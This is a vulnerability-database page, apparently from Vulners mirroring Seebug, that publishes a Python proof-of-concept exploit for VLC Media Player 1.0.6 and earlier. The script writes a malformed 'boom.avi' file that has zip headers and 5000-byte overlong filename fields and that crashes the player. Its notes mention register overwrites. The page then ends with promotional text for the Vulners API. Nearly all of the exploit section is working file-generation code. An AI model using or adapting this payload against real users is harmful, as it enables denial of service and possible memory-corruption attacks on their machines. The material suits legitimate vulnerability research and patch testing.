Lucene search
K

VLC Media Player <= 1.0.6 (.avi) - Media File Crash PoC

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 14 Views

VLC Media Player <= 1.0.6 (.avi) - Media File Crash PoC. Dr_IDE found a malformed media file crash PoC that affects VLC Media Player version 1.0.6 or below. The exploit is tested on Windows 7, Ubuntu 9, and OSX 10.6.X

Code

                                                #!/usr/bin/python

######################################################################################################
#
# VLC Media Player &#60;=1.0.6 Malformed Media File Crash PoC
# Found By: Dr_IDE
# Tested:   Windows 7, Ubuntu 9, OSX 10.6.X
# Download: http://www.videolan.org
# Notes:	Register overwrites seem very unpredictable at best...
# Greets:	Offsec and Corelan Teams
#
######################################################################################################
 
ldf_header = (&#34;\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00&#34;
&#34;\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00&#34;)
 
cdf_header = (&#34;\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00&#34;
&#34;\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00\x00\x00\x00\x01\x00\x24\x00\x00&#34;
&#34;\x00\x00\x00\x00\x00&#34;)
 
eofcdf_header = (&#34;\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00&#34;
&#34;\x12\x10\x00\x00\x02\x10\x00\x00\x00\x00&#34;)
 
filename = &#34;VLC_Doesnt_Like_Videos_That_Are_Really_Zip_Files.AVI&#34;
 
exploit = filename
exploit += &#34;\x41&#34; * 5000
 
print &#34;[+] Writing file&#34;

file = open(&#39;boom.avi&#39;,&#39;w&#39;); #Anything here works, mpg, mp4, asf, mov etc...
file.write(ldf_header + exploit + cdf_header + exploit + eofcdf_header);
file.close()

print &#34;[+] Exploit file created!!&#34;

                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation